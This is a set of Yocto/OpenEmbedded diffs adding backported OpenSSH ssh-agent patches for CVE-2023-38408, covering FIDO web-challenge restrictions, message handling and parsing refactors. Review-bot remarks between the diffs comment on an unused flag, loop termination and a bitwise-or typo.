+Subject: [PATCH 05/12] upstream: Restrict ssh-agent from signing web
+ challenges for FIDO
+
+keys.
+
+When signing messages in ssh-agent using a FIDO key that has an
+application string that does not start with "ssh:", ensure that the
+message being signed is one of the forms expected for the SSH protocol
+(currently pubkey authentication and sshsig signatures).
+
+This prevents ssh-agent forwarding on a host that has FIDO keys
+attached granting the ability for the remote side to sign challenges
+for web authentication using those keys too.
+
+Note that the converse case of web browsers signing SSH challenges is
+already precluded because no web RP can have the "ssh:" prefix in the
+application string that we require.
+
+ok markus@
+
+OpenBSD-Commit-ID: 9ab6012574ed0352d2f097d307f4a988222d1b19
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/0c111eb84efba7c2a38b2cc3278901a0123161b9]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 110 +++++++++++++++++++++++++++++++++++++++++++++++-----
+ 1 file changed, 100 insertions(+), 10 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index ceb348c..1794f35 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.255 2020/02/06 22:30:54 naddy Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -77,6 +77,7 @@
+
+ #include "xmalloc.h"
+ #include "ssh.h"
++#include "ssh2.h"
+ #include "sshbuf.h"
+ #include "sshkey.h"
+ #include "authfd.h"
+@@ -167,6 +168,9 @@ static long lifetime = 0;
+
+ static int fingerprint_hash = SSH_FP_HASH_DEFAULT;
+
++/* Refuse signing of non-SSH messages for web-origin FIDO keys */
++static int restrict_websafe = 1;
++
+ static void
+ close_socket(SocketEntry *e)
+ {
+@@ -282,6 +286,80 @@ agent_decode_alg(struct sshkey *key, u_int flags)
+ return NULL;
+ }
+
++/*
++ * This function inspects a message to be signed by a FIDO key that has a
++ * web-like application string (i.e. one that does not begin with "ssh:".
++ * It checks that the message is one of those expected for SSH operations
++ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
++ * for the web.
++ */
++static int
++check_websafe_message_contents(struct sshkey *key,
++ const u_char *msg, size_t len)
++{
++ int matched = 0;
++ struct sshbuf *b;
++ u_char m, n;
++ char *cp1 = NULL, *cp2 = NULL;
++ int r;
++ struct sshkey *mkey = NULL;
++
++ if ((b = sshbuf_from(msg, len)) == NULL)
++ fatal("%s: sshbuf_new", __func__);
++
++ /* SSH userauth request */
++ if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
++ (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
++ (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
++ (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
++ (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
++ (r = sshkey_froms(b, &mkey)) == 0 && /* key */
++ sshbuf_len(b) == 0) {
++ debug("%s: parsed userauth", __func__);
++ if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
++ strcmp(cp1, "ssh-connection") == 0 &&
++ strcmp(cp2, "publickey") == 0 &&
++ sshkey_equal(key, mkey)) {
++ debug("%s: well formed userauth", __func__);
++ matched = 1;
++ }
++ }
++ free(cp1);
++ free(cp2);
++ sshkey_free(mkey);
++ sshbuf_free(b);
++ if (matched)
++ return 1;
++
++ if ((b = sshbuf_from(msg, len)) == NULL)
++ fatal("%s: sshbuf_new", __func__);
++ cp1 = cp2 = NULL;
++ mkey = NULL;
++
++ /* SSHSIG */
++ if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
++ (r = sshbuf_consume(b, 6)) == 0 &&
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
++ sshbuf_len(b) == 0) {
++ debug("%s: parsed sshsig", __func__);
++ matched = 1;
++ }
++
++ sshbuf_free(b);
++ if (matched)
++ return 1;
++
++ /* XXX CA signature operation */
++
++ error("web-origin key attempting to sign non-SSH message");
++ return 0;
++}
++
+ /* ssh2 only */
+ static void
+ process_sign_request2(SocketEntry *e)
+@@ -314,14 +392,20 @@ process_sign_request2(SocketEntry *e)
+ verbose("%s: user refused key", __func__);
+ goto send;
+ }
+- if (sshkey_is_sk(id->key) &&
+- (id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
+- if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
+- SSH_FP_DEFAULT)) == NULL)
+- fatal("%s: fingerprint failed", __func__);
+- notifier = notify_start(0,
+- "Confirm user presence for key %s %s",
+- sshkey_type(id->key), fp);
++ if (sshkey_is_sk(id->key)) {
++ if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
++ !check_websafe_message_contents(key, data, dlen)) {
++ /* error already logged */
++ goto send;
++ }
++ if ((id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
++ if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
++ SSH_FP_DEFAULT)) == NULL)
++ fatal("%s: fingerprint failed", __func__);
++ notifier = notify_start(0,
++ "Confirm user presence for key %s %s",
++ sshkey_type(id->key), fp);
++ }
+ }
+ if ((r = sshkey_sign(id->key, &signature, &slen,
+ data, dlen, agent_decode_alg(key, flags),
+@@ -1214,7 +1298,7 @@ main(int ac, char **av)
+ __progname = ssh_get_progname(av[0]);
+ seed_rng();
+
+- while ((ch = getopt(ac, av, "cDdksE:a:P:t:")) != -1) {
++ while ((ch = getopt(ac, av, "cDdksE:a:O:P:t:")) != -1) {
+ switch (ch) {
+ case 'E':
+ fingerprint_hash = ssh_digest_alg_by_name(optarg);
+@@ -1229,6 +1313,12 @@ main(int ac, char **av)
+ case 'k':
+ k_flag++;
+ break;
++ case 'O':
++ if (strcmp(optarg, "no-restrict-websafe") == 0)
++ restrict_websafe = 0;
++ else
++ fatal("Unknown -O option");
++ break;
+ case 'P':
+ if (provider_whitelist != NULL)
+ fatal("-P option already specified");
+--
+2.41.0
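Review bot: `restrict_websafe` is declared and then cleared by the new `-O no-restrict-websafe` case in `main`, but the new test in `process_sign_request2` never reads it, so as far as these hunks show the option is accepted and changes nothing. This fails safe, because the web-challenge restriction stays on, but an operator who passes the option gets different behaviour from what the flag name promises. If the opt-out is intended, the condition should begin `if (restrict_websafe && strncmp(id->key->sk_application, "ssh:", 4) != 0 &&`; otherwise the option and the variable should be dropped. Both `process_sign_request2` and `main` continue outside their hunks, so a read of the flag elsewhere cannot be ruled out from here.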
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
new file mode 100644
index 0000000000..ac494aab0b
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
@@ -0,0 +1,73 @@
+From a5d845b7b42861d18f43e83de9f24c7374d1b458 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 18 Sep 2020 08:16:38 +0000
+Subject: [PATCH 06/12] upstream: handle multiple messages in a single read()
+
+PR#183 by Dennis Kaarsemaker; feedback and ok markus@
+
+OpenBSD-Commit-ID: 8570bb4d02d00cf70b98590716ea6a7d1cce68d1
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/52a03e9fca2d74eef953ddd4709250f365ca3975]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 19 +++++++++++++------
+ 1 file changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 1794f35..78f7268 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -853,8 +853,10 @@ send:
+ }
+ #endif /* ENABLE_PKCS11 */
+
+-/* dispatch incoming messages */
+-
++/*
++ * dispatch incoming message.
++ * returns 1 on success, 0 for incomplete messages or -1 on error.
++ */
+ static int
+ process_message(u_int socknum)
+ {
+@@ -908,7 +910,7 @@ process_message(u_int socknum)
+ /* send a fail message for all other request types */
+ send_status(e, 0);
+ }
+- return 0;
++ return 1;
+ }
+
+ switch (type) {
+@@ -952,7 +954,7 @@ process_message(u_int socknum)
+ send_status(e, 0);
+ break;
+ }
+- return 0;
++ return 1;
+ }
+
+ static void
+@@ -1043,7 +1045,12 @@ handle_conn_read(u_int socknum)
+ if ((r = sshbuf_put(sockets[socknum].input, buf, len)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+ explicit_bzero(buf, sizeof(buf));
+- process_message(socknum);
++ for (;;) {
++ if ((r = process_message(socknum)) == -1)
++ return -1;
++ else if (r == 0)
++ break;
++ }
+ return 0;
+ }
+
+--
+2.41.0
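Review bot: The new `for (;;)` loop in `handle_conn_read` terminates only if every `process_message()` call that returns 1 has removed a complete message from the socket's input buffer, and that consumption happens outside these hunks. The loop deserves a comment stating the dependency, for example `/* each successful call consumes one message; 0 means only a partial message remains */`. The loop also continues on any return value other than -1 and 0, so writing it as `while ((r = process_message(socknum)) == 1)` followed by `if (r == -1) return -1;` would stop on an unexpected value instead of spinning. `handle_conn_read` now propagates -1 where the result was previously ignored; how its caller treats that is not visible here.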
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
new file mode 100644
index 0000000000..0dcf23ae17
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
@@ -0,0 +1,125 @@
+From 653cc18c922fc387b3d3aa1b081c5e5283cce28a Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 Jan 2021 00:47:47 +0000
+Subject: [PATCH 07/12] upstream: use recallocarray to allocate the agent
+ sockets table;
+
+also clear socket entries that are being marked as unused.
+
+spinkle in some debug2() spam to make it easier to watch an agent
+do its thing.
+
+ok markus
+
+OpenBSD-Commit-ID: 74582c8e82e96afea46f6c7b6813a429cbc75922
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1fe16fd61bb53944ec510882acc0491abd66ff76]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 20 ++++++++++++++++----
+ 1 file changed, 16 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 78f7268..2635bc5 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -175,11 +175,12 @@ static void
+ close_socket(SocketEntry *e)
+ {
+ close(e->fd);
+- e->fd = -1;
+- e->type = AUTH_UNUSED;
+ sshbuf_free(e->input);
+ sshbuf_free(e->output);
+ sshbuf_free(e->request);
++ memset(e, '\0', sizeof(*e));
++ e->fd = -1;
++ e->type = AUTH_UNUSED;
+ }
+
+ static void
+@@ -249,6 +250,8 @@ process_request_identities(SocketEntry *e)
+ struct sshbuf *msg;
+ int r;
+
++ debug2("%s: entering", __func__);
++
+ if ((msg = sshbuf_new()) == NULL)
+ fatal("%s: sshbuf_new failed", __func__);
+ if ((r = sshbuf_put_u8(msg, SSH2_AGENT_IDENTITIES_ANSWER)) != 0 ||
+@@ -441,6 +444,7 @@ process_remove_identity(SocketEntry *e)
+ struct sshkey *key = NULL;
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshkey_froms(e->request, &key)) != 0) {
+ error("%s: get key: %s", __func__, ssh_err(r));
+ goto done;
+@@ -467,6 +471,7 @@ process_remove_all_identities(SocketEntry *e)
+ {
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ /* Loop over all identities and clear the keys. */
+ for (id = TAILQ_FIRST(&idtab->idlist); id;
+ id = TAILQ_FIRST(&idtab->idlist)) {
+@@ -520,6 +525,7 @@ process_add_identity(SocketEntry *e)
+ u_char ctype;
+ int r = SSH_ERR_INTERNAL_ERROR;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshkey_private_deserialize(e->request, &k)) != 0 ||
+ k == NULL ||
+ (r = sshbuf_get_cstring(e->request, &comment, NULL)) != 0) {
+@@ -667,6 +673,7 @@ process_lock_agent(SocketEntry *e, int lock)
+ static u_int fail_count = 0;
+ size_t pwlen;
+
++ debug2("%s: entering", __func__);
+ /*
+ * This is deliberately fatal: the user has requested that we lock,
+ * but we can't parse their request properly. The only safe thing to
+@@ -738,6 +745,7 @@ process_add_smartcard_key(SocketEntry *e)
+ struct sshkey **keys = NULL, *k;
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
+ (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
+ error("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -818,6 +826,7 @@ process_remove_smartcard_key(SocketEntry *e)
+ int r, success = 0;
+ Identity *id, *nxt;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
+ (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
+ error("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -962,6 +971,8 @@ new_socket(sock_type type, int fd)
+ {
+ u_int i, old_alloc, new_alloc;
+
++ debug("%s: type = %s", __func__, type == AUTH_CONNECTION ? "CONNECTION" :
++ (type == AUTH_SOCKET ? "SOCKET" : "UNKNOWN"));
+ set_nonblock(fd);
+
+ if (fd > max_fd)
+@@ -981,7 +992,8 @@ new_socket(sock_type type, int fd)
+ }
+ old_alloc = sockets_alloc;
+ new_alloc = sockets_alloc + 10;
+- sockets = xreallocarray(sockets, new_alloc, sizeof(sockets[0]));
++ sockets = xrecallocarray(sockets, old_alloc, new_alloc,
++ sizeof(sockets[0]));
+ for (i = old_alloc; i < new_alloc; i++)
+ sockets[i].type = AUTH_UNUSED;
+ sockets_alloc = new_alloc;
+--
+2.41.0
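Review bot: The `memset(e, '\0', sizeof(*e))` added to `close_socket` is what stops a reused table slot from carrying the just-freed `input`, `output` and `request` pointers, but nothing in the code says so. A one-line comment such as `/* clear freed pointers so a reused slot starts from zero */` would keep a later cleanup from removing it. The same reasoning applies to the switch to `xrecallocarray` in `new_socket`, where the following loop that sets `type = AUTH_UNUSED` presumably becomes redundant only if that enumerator is zero. As a smaller point, `new_socket` logs at `debug` while every other trace added in this patch uses `debug2`.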
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
new file mode 100644
index 0000000000..141c8113bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
@@ -0,0 +1,315 @@
+From c30158ea225cf8ad67c3dcc88fa9e4afbf8959a7 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 Jan 2021 00:53:31 +0000
+Subject: [PATCH 08/12] upstream: more ssh-agent refactoring
+
+Allow confirm_key() to accept an additional reason suffix
+
+Factor publickey userauth parsing out into its own function and allow
+it to optionally return things it parsed out of the message to its
+caller.
+
+feedback/ok markus@
+
+OpenBSD-Commit-ID: 29006515617d1aa2d8b85cd2bf667e849146477e
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/e0e8bee8024fa9e31974244d14f03d799e5c0775]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 197 ++++++++++++++++++++++++++++++++++------------------
+ 1 file changed, 130 insertions(+), 67 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 2635bc5..7ad323c 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -216,15 +216,16 @@ lookup_identity(struct sshkey *key)
+
+ /* Check confirmation of keysign request */
+ static int
+-confirm_key(Identity *id)
++confirm_key(Identity *id, const char *extra)
+ {
+ char *p;
+ int ret = -1;
+
+ p = sshkey_fingerprint(id->key, fingerprint_hash, SSH_FP_DEFAULT);
+ if (p != NULL &&
+- ask_permission("Allow use of key %s?\nKey fingerprint %s.",
+- id->comment, p))
++ ask_permission("Allow use of key %s?\nKey fingerprint %s.%s%s",
++ id->comment, p,
++ extra == NULL ? "" : "\n", extra == NULL ? "" : extra))
+ ret = 0;
+ free(p);
+
+@@ -290,74 +291,133 @@ agent_decode_alg(struct sshkey *key, u_int flags)
+ }
+
+ /*
+- * This function inspects a message to be signed by a FIDO key that has a
+- * web-like application string (i.e. one that does not begin with "ssh:".
+- * It checks that the message is one of those expected for SSH operations
+- * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
+- * for the web.
++ * Attempt to parse the contents of a buffer as a SSH publickey userauth
++ * request, checking its contents for consistency and matching the embedded
++ * key against the one that is being used for signing.
++ * Note: does not modify msg buffer.
++ * Optionally extract the username and session ID from the request.
+ */
+ static int
+-check_websafe_message_contents(struct sshkey *key,
+- const u_char *msg, size_t len)
++parse_userauth_request(struct sshbuf *msg, const struct sshkey *expected_key,
++ char **userp, struct sshbuf **sess_idp)
+ {
+- int matched = 0;
+- struct sshbuf *b;
+- u_char m, n;
+- char *cp1 = NULL, *cp2 = NULL;
++ struct sshbuf *b = NULL, *sess_id = NULL;
++ char *user = NULL, *service = NULL, *method = NULL, *pkalg = NULL;
+ int r;
++ u_char t, sig_follows;
+ struct sshkey *mkey = NULL;
+
+- if ((b = sshbuf_from(msg, len)) == NULL)
+- fatal("%s: sshbuf_new", __func__);
++ if (userp != NULL)
++ *userp = NULL;
++ if (sess_idp != NULL)
++ *sess_idp = NULL;
++ if ((b = sshbuf_fromb(msg)) == NULL)
++ fatal("%s: sshbuf_fromb", __func__);
+
+ /* SSH userauth request */
+- if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
+- (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
+- (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
+- (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
+- (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
+- (r = sshkey_froms(b, &mkey)) == 0 && /* key */
+- sshbuf_len(b) == 0) {
+- debug("%s: parsed userauth", __func__);
+- if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
+- strcmp(cp1, "ssh-connection") == 0 &&
+- strcmp(cp2, "publickey") == 0 &&
+- sshkey_equal(key, mkey)) {
+- debug("%s: well formed userauth", __func__);
+- matched = 1;
+- }
++ if ((r = sshbuf_froms(b, &sess_id)) != 0)
++ goto out;
++ if (sshbuf_len(sess_id) == 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
+ }
+- free(cp1);
+- free(cp2);
+- sshkey_free(mkey);
++ if ((r = sshbuf_get_u8(b, &t)) != 0 || /* SSH2_MSG_USERAUTH_REQUEST */
++ (r = sshbuf_get_cstring(b, &user, NULL)) != 0 || /* server user */
++ (r = sshbuf_get_cstring(b, &service, NULL)) != 0 || /* service */
++ (r = sshbuf_get_cstring(b, &method, NULL)) != 0 || /* method */
++ (r = sshbuf_get_u8(b, &sig_follows)) != 0 || /* sig-follows */
++ (r = sshbuf_get_cstring(b, &pkalg, NULL)) != 0 || /* alg */
++ (r = sshkey_froms(b, &mkey)) != 0) /* key */
++ goto out;
++ if (t != SSH2_MSG_USERAUTH_REQUEST ||
++ sig_follows != 1 ||
++ strcmp(service, "ssh-connection") != 0 ||
++ !sshkey_equal(expected_key, mkey) ||
++ sshkey_type_from_name(pkalg) != expected_key->type) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ if (strcmp(method, "publickey") != 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ if (sshbuf_len(b) != 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ /* success */
++ r = 0;
++ debug("%s: well formed userauth", __func__);
++ if (userp != NULL) {
++ *userp = user;
++ user = NULL;
++ }
++ if (sess_idp != NULL) {
++ *sess_idp = sess_id;
++ sess_id = NULL;
++ }
++ out:
+ sshbuf_free(b);
+- if (matched)
+- return 1;
++ sshbuf_free(sess_id);
++ free(user);
++ free(service);
++ free(method);
++ free(pkalg);
++ sshkey_free(mkey);
++ return r;
++}
+
+- if ((b = sshbuf_from(msg, len)) == NULL)
+- fatal("%s: sshbuf_new", __func__);
+- cp1 = cp2 = NULL;
+- mkey = NULL;
+-
+- /* SSHSIG */
+- if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
+- (r = sshbuf_consume(b, 6)) == 0 &&
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
+- (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
+- (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
+- sshbuf_len(b) == 0) {
+- debug("%s: parsed sshsig", __func__);
+- matched = 1;
+- }
++/*
++ * Attempt to parse the contents of a buffer as a SSHSIG signature request.
++ * Note: does not modify buffer.
++ */
++static int
++parse_sshsig_request(struct sshbuf *msg)
++{
++ int r;
++ struct sshbuf *b;
+
++ if ((b = sshbuf_fromb(msg)) == NULL)
++ fatal("%s: sshbuf_fromb", __func__);
++
++ if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) != 0 ||
++ (r = sshbuf_consume(b, 6)) != 0 ||
++ (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* namespace */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0 || /* reserved */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* hashalg */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0) /* H(msg) */
++ goto out;
++ if (sshbuf_len(b) != 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ /* success */
++ r = 0;
++ out:
+ sshbuf_free(b);
+- if (matched)
++ return r;
++}
++
++/*
++ * This function inspects a message to be signed by a FIDO key that has a
++ * web-like application string (i.e. one that does not begin with "ssh:".
++ * It checks that the message is one of those expected for SSH operations
++ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
++ * for the web.
++ */
++static int
++check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
++{
++ if (parse_userauth_request(data, key, NULL, NULL) == 0) {
++ debug("%s: signed data matches public key userauth request", __func__);
+ return 1;
++ }
++ if (parse_sshsig_request(data) == 0) {
++ debug("%s: signed data matches SSHSIG signature request", __func__);
++ return 1;
++ }
+
+- /* XXX CA signature operation */
++ /* XXX check CA signature operation */
+
+ error("web-origin key attempting to sign non-SSH message");
+ return 0;
+@@ -367,21 +427,22 @@ check_websafe_message_contents(struct sshkey *key,
+ static void
+ process_sign_request2(SocketEntry *e)
+ {
+- const u_char *data;
+ u_char *signature = NULL;
+- size_t dlen, slen = 0;
++ size_t i, slen = 0;
+ u_int compat = 0, flags;
+ int r, ok = -1;
+ char *fp = NULL;
+- struct sshbuf *msg;
++ struct sshbuf *msg = NULL, *data = NULL;
+ struct sshkey *key = NULL;
+ struct identity *id;
+ struct notifier_ctx *notifier = NULL;
+
+- if ((msg = sshbuf_new()) == NULL)
++ debug("%s: entering", __func__);
++
++ if ((msg = sshbuf_new()) == NULL | (data = sshbuf_new()) == NULL)
+ fatal("%s: sshbuf_new failed", __func__);
+ if ((r = sshkey_froms(e->request, &key)) != 0 ||
+- (r = sshbuf_get_string_direct(e->request, &data, &dlen)) != 0 ||
++ (r = sshbuf_get_stringb(e->request, data)) != 0 ||
+ (r = sshbuf_get_u32(e->request, &flags)) != 0) {
+ error("%s: couldn't parse request: %s", __func__, ssh_err(r));
+ goto send;
+@@ -391,13 +452,13 @@ process_sign_request2(SocketEntry *e)
+ verbose("%s: %s key not found", __func__, sshkey_type(key));
+ goto send;
+ }
+- if (id->confirm && confirm_key(id) != 0) {
++ if (id->confirm && confirm_key(id, NULL) != 0) {
+ verbose("%s: user refused key", __func__);
+ goto send;
+ }
+ if (sshkey_is_sk(id->key)) {
+ if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
+- !check_websafe_message_contents(key, data, dlen)) {
++ !check_websafe_message_contents(key, data)) {
+ /* error already logged */
+ goto send;
+ }
+@@ -411,7 +472,7 @@ process_sign_request2(SocketEntry *e)
+ }
+ }
+ if ((r = sshkey_sign(id->key, &signature, &slen,
+- data, dlen, agent_decode_alg(key, flags),
++ sshbuf_ptr(data), sshbuf_len(data), agent_decode_alg(key, flags),
+ id->sk_provider, compat)) != 0) {
+ error("%s: sshkey_sign: %s", __func__, ssh_err(r));
+ goto send;
+@@ -420,8 +481,7 @@ process_sign_request2(SocketEntry *e)
+ ok = 0;
+ send:
+ notify_complete(notifier);
+- sshkey_free(key);
+- free(fp);
++
+ if (ok == 0) {
+ if ((r = sshbuf_put_u8(msg, SSH2_AGENT_SIGN_RESPONSE)) != 0 ||
+ (r = sshbuf_put_string(msg, signature, slen)) != 0)
+@@ -432,7 +492,10 @@ process_sign_request2(SocketEntry *e)
+ if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+
++ sshbuf_free(data);
+ sshbuf_free(msg);
++ sshkey_free(key);
++ free(fp);
+ free(signature);
+ }
+
+--
+2.41.0
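Review bot: The allocation check added at the top of `process_sign_request2` joins its two tests with a bitwise `|` where a logical `||` reads as intended: `if ((msg = sshbuf_new()) == NULL | (data = sshbuf_new()) == NULL)`. Because `==` binds tighter than `|`, the result is still correct and both allocations run, but it looks like a typo and compilers may warn about it; `if ((msg = sshbuf_new()) == NULL || (data = sshbuf_new()) == NULL)` is the clearer form. The same hunk replaces `dlen` with `size_t i`, which nothing in this patch uses. The function's body continues outside the hunks shown.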
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
new file mode 100644
index 0000000000..b519ccce42
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
@@ -0,0 +1,38 @@
+From 7adba46611e5d076d7d12d9f4162dd4cabd5ff50 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 29 Jan 2021 06:28:10 +0000
+Subject: [PATCH 09/12] upstream: give typedef'd struct a struct name; makes
+ the fuzzer I'm
+
+writing a bit easier
+
+OpenBSD-Commit-ID: 1052ab521505a4d8384d67acb3974ef81b8896cb
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/8afaa7d7918419d3da6c0477b83db2159879cb33]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 7ad323c..c99927c 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -108,7 +108,7 @@ typedef enum {
+ AUTH_CONNECTION
+ } sock_type;
+
+-typedef struct {
++typedef struct socket_entry {
+ int fd;
+ sock_type type;
+ struct sshbuf *input;
+--
+2.41.0
